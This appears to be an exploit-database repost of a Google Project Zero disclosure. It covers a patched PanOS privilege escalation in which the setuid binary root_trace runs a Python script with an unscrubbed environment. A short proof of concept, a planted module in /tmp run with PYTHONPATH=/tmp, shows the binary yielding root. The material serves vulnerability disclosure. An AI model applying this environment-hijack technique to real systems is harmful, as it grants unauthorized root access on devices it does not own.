Lucene search

K
zdtGoogle Security Research1337DAY-ID-26360
HistoryNov 19, 2016 - 12:00 a.m.

Palo Alto Networks PanOS root_trace - Privilege Escalation Vulnerability

2016-11-1900:00:00
Google Security Research
0day.today
35

0.001 Low

EPSS

Percentile

26.2%

Exploit for linux platform in category local exploits

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=912
 
The setuid root executable /usr/local/bin/root_trace essentially just does setuid(0) then system("/usr/local/bin/masterd"), which is a python script:
 
$ ls -l /usr/local/bin/root_trace 
-rwsr-xr-x 1 root root 12376 Oct 17  2014 /usr/local/bin/root_trace
 
As the environment is not scrubbed, you can just do something like this:
 
$ cat /tmp/sysd.py
import os
os.system("id")
os._exit(0);
 
$ PYTHONPATH=/tmp root_trace
uid=0(root) gid=502(admin) groups=501(noradgrp),502(admin)
 
This was fixed by PAN:
 
http://securityadvisories.paloaltonetworks.com/Home/Detail/67

#  0day.today [2018-02-19]  #

0.001 Low

EPSS

Percentile

26.2%